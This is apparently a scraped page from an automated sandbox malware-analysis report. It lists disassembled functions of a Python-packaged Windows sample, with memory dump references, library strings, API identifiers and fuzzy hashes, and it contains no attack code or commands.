                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocErr_$Arg_FormatKeywordsModuleParseStateStringThread_allocate_lockTupleType_
                                                                                                                                                                                                      • String ID: Cannot specify both preset and filter chain$Integrity checks are only supported by FORMAT_XZ$Invalid container format: %d$Unable to allocate lock$|iiOO:LZMACompressor
                                                                                                                                                                                                      • API String ID: 2997458608-3984722346
                                                                                                                                                                                                      • Opcode ID: 9d33e9e74a13254238e8a9095ced3c150b01aeceb28cf37f8e25fad15e931a3b
                                                                                                                                                                                                      • Instruction ID: ef0688fa6874824ba5f1e773b1c3ce714680004d345b822f187b3181d7b92b33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d33e9e74a13254238e8a9095ced3c150b01aeceb28cf37f8e25fad15e931a3b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 376119B2E09A1289EB548F39EC410B8B7A4FB48B98B54A532DB0F53764DF3CE945C744
                                                                                                                                                                                                      Function 00007FFBBCD49B14 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                      • Instruction ID: 5e2064e68c62c7a37a163bf6b7f8252c2704578a9c68d05e3fa1a4844632b995
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF17CFAB08A8299EB10DF79D4982FC37B4AB0474CB444036EB5D57A99DF38D916C348
                                                                                                                                                                                                      Function 00007FFBBB6086D0 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$MemoryString
                                                                                                                                                                                                      • String ID: Corrupt input data$Input format not supported by decoder$Insufficient buffer space$Internal error$Invalid or unsupported options$Memory usage limit exceeded$Unrecognized error from liblzma: %d$Unsupported integrity check
                                                                                                                                                                                                      • API String ID: 60457842-2177155514
                                                                                                                                                                                                      • Opcode ID: 99a67f93001655eb32d03fea5a45ff6746db2e15172cea66ae1d1f9a8111160f
                                                                                                                                                                                                      • Instruction ID: 5f401aa5d9530c57cfe1bbe9f57c6a9951a47f63d31fdefbb402642bd5f1bf71
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99a67f93001655eb32d03fea5a45ff6746db2e15172cea66ae1d1f9a8111160f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F21FAE4E2C61389EE68C73EDCA4078A2A1BB46350FD4E031C70F069B89E5EED449618
                                                                                                                                                                                                      Function 00007FFBBCD419D4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 4223619315-393685449
                                                                                                                                                                                                      • Opcode ID: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                      • Instruction ID: eb93e827369dc282cf68c3e82cda56a293399048e57e57e60db809a29dc3a2bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48D159FAB0868186EB20DF79D4493AD77A0FB45798F100235EB8D57A5ADF38E494C704
                                                                                                                                                                                                      Function 00007FF7FF582180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction ID: 5208bd13e88c9471ebb121d1a79eb7c18ec6bb839ce31eb62f93fd72a425a48f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A51D626604BE186D7249F26A4181FAFBA1F798B61F404225EBEF43694DF3CD055DB20
                                                                                                                                                                                                      Function 00007FFBBB6105D4 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyMapping_Check.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6105EC
                                                                                                                                                                                                      • PyMapping_GetOptionalItemString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB61060B
                                                                                                                                                                                                      • PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610627
                                                                                                                                                                                                      • PyErr_Occurred.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610643
                                                                                                                                                                                                      • PyErr_Format.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6106E3
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6106FE
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB615667
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$LongMapping_String$CheckDeallocFormatItemLong_OccurredOptionalUnsigned
                                                                                                                                                                                                      • String ID: Filter specifier must be a dict or dict-like object$Filter specifier must have an "id" entry$Invalid filter ID: %llu
                                                                                                                                                                                                      • API String ID: 1419212076-3390802605
                                                                                                                                                                                                      • Opcode ID: b1a312e01708d1eea9ab1fd864ba648df84427f25b19ea49e84bd239f63c50e1
                                                                                                                                                                                                      • Instruction ID: cc3a2f25962324dbbdcf79a998a980a03d1ed2f116bb97828b5caa4397fc1b4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1a312e01708d1eea9ab1fd864ba648df84427f25b19ea49e84bd239f63c50e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D31DAF1A08A4389EE589F7ADD55178B2A0FF85B84F08E032DB0F46674DE2CAC559748
                                                                                                                                                                                                      Function 00007FF7FF5880B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                      • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction ID: a689ae1f0651379f4a7ca02aaceeab5828097c6693eed5471cac9fc214f9df41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E221B725B09AC282E7416B7AA8441B9E751FF88B91FD84331DE3D473E4DE2CD5A1C3A1
                                                                                                                                                                                                      Function 00007FFBBCD47888 Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
                                                                                                                                                                                                      • Instruction ID: d1fba7c03b36b6a917fe2a2cece46f6af12a626b519ee927bc23183e2bfef55c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5715BF6B04A429AEB10DF78D4991EC33B1AB0478CB814435DF0D57A89EF38D61AC798
                                                                                                                                                                                                      Function 00007FFBBB607FEC Relevance: 16.7, APIs: 11, Instructions: 154COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Mem_$memcpy$Bytes_DeallocErr_FreeFromMallocNoneReallocSizeStringmemmove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1220578264-0
                                                                                                                                                                                                      • Opcode ID: 2ce1e75fb51f9a3f206443671645bee960fc5d54ef179fc2ab26c157188d4aa1
                                                                                                                                                                                                      • Instruction ID: a0fc774510eabffd18e7a0a48d5763ceb5a8752a4fcae13697d1afb4adcdbd7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce1e75fb51f9a3f206443671645bee960fc5d54ef179fc2ab26c157188d4aa1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B65119A2A09A4285EF64CF3AE980239B2A5FF54F94F549131CF4F17764DF38E8918308
                                                                                                                                                                                                      Function 00007FFBBCD4D650 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                      • API String ID: 0-3207858774
                                                                                                                                                                                                      • Opcode ID: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
                                                                                                                                                                                                      • Instruction ID: ad124b6483269d1734449237d20bbd1c0ed6f8064a8ca74404ee7aaaa5a29c77
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50819CEAB08A8689FB10DF39D4982BC73A1AB54B88F445136DB4D03795DF3CE946C358
                                                                                                                                                                                                      Function 00007FFBBCD49358 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                      • API String ID: 2943138195-1464470183
                                                                                                                                                                                                      • Opcode ID: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
                                                                                                                                                                                                      • Instruction ID: 63f0bb7e195d0441c3e1cfdddb9aba016caa5506520b299fe1de33bcc029e535
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D5149FAF18A1289FB10CB79E8886BC37B5BB14344F540135DB1E56A99DF39E505C708
                                                                                                                                                                                                      Function 00007FFBBB63A1E0 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 190073905-0
                                                                                                                                                                                                      • Opcode ID: 70915207e7be9065a407a64c40093981d4266dbe3b87672567642ae960650288
                                                                                                                                                                                                      • Instruction ID: b9d31e98466a28afc4ba4fdd12a1f3028916c414d2720dc52a7174d3e28b8a74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70915207e7be9065a407a64c40093981d4266dbe3b87672567642ae960650288
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B38149A3E0860386FA54AB7DDC8527DA690BF46780F54C035DB4ED36B6DE2CEC45E608
                                                                                                                                                                                                      Function 00007FFBBB612EC0 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 190073905-0
                                                                                                                                                                                                      • Opcode ID: 304648fe44af0b0642874aeeb3fd5233e45cc95158f24f653d2d0f5b48aa927d
                                                                                                                                                                                                      • Instruction ID: 72ba158f4d19dc39e2391dcfeb31c0bd59cc05245f4ba1a9bf87dbf3ea5c6db4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 304648fe44af0b0642874aeeb3fd5233e45cc95158f24f653d2d0f5b48aa927d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA8166E1E08643A6FA149B3DDC41279F6A4BF45B80F44E434EB0F563B6DE2CEC458608
                                                                                                                                                                                                      Function 00007FFBBB633250 Relevance: 15.2, APIs: 10, Instructions: 150COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Mem_memcpy$Bytes_DeallocFromMallocReallocSizeString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2377850682-0
                                                                                                                                                                                                      • Opcode ID: 899608a81334ef61ac34276615ae4fc4249bfbbc58ed4a6ca9e48d25f1f2f9ab
                                                                                                                                                                                                      • Instruction ID: c4741342383522ed4c3c7b5b42ce3c38f8f881b99ac2e6f99828b2bbf3c7c249
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 899608a81334ef61ac34276615ae4fc4249bfbbc58ed4a6ca9e48d25f1f2f9ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB5128B3A09B8281EB108F3EE944279A2A4BB05B84F18C435CF8E57765DF3CE855D308
                                                                                                                                                                                                      Function 00007FF7FF596300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
